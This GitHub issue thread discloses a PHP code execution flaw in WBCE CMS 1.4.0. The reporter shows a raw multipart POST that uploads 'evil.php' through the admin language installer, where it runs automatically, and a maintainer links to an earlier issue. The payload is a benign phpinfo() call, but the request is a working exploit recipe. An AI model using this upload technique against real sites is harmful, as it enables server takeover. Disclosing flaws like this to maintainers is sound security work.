### ISSUE TITLE
WBCE 1.4.0 PHP Code Execution Vulnerability

### ISSUE THREAD

**Issue by Invi0sible** [WBCE/WBCE_CMS#447]
I found a php code execution vulnerability at WBCE 1.4.0
Step:
1. login as admin
2.Add-ons——upload php file via /wbce/admin/languages/install.php
![image](https://user-images.githubusercontent.com/33925178/63246003-37e1bd00-c294-11e9-9154-bf1bf461e151.png)

POST /wbce/admin/languages/install.php HTTP/1.1
Host: 10.211.55.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.211.55.8/wbce/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------19519746611877935855900755026
Content-Length: 519
Connection: close
Cookie: Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1566047983; Hm_lpvt_12fc28a048b3367aa46f20380b6678ff=1566048017; PHPSESSID=ij2nk2ivsvmrqpmr9ogid9joh3; frog_auth_user=exp%3D1567334386%26id%3D1%26digest%3D292b8f2e0fa3eebd17b1b9580c1a0c6a; CONCRETE5_LOGIN=1; lang=gb; ConcreteSitemapTreeID=1; __atuvc=2%7C34; WBCELastConnectJS=1566198860; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3Aclosedsidebar%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3Aclosedsidebar%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; wb-4900-sid=dm9stpb787o2rtju2k5d156ki3
Upgrade-Insecure-Requests: 1

-----------------------------19519746611877935855900755026
Content-Disposition: form-data; name="formtoken"

390b6d97-eb70f2bcd188a30296406f3dd151a624d401835f
-----------------------------19519746611877935855900755026
Content-Disposition: form-data; name="userfile"; filename="evil.php"
Content-Type: text/php

<?php
eval(phpinfo());
?>
-----------------------------19519746611877935855900755026
Content-Disposition: form-data; name="submit"

-----------------------------19519746611877935855900755026--

![image](https://user-images.githubusercontent.com/33925178/63246063-5778e580-c294-11e9-9589-6c2c8a9cf96a.png)
3.  The evil php file is automatically executed
![image](https://user-images.githubusercontent.com/33925178/63246112-78d9d180-c294-11e9-9674-51627435b7b1.png)

**Comment by instantflorian** [comment]
See https://github.com/WBCE/WBCE_CMS/issues/406
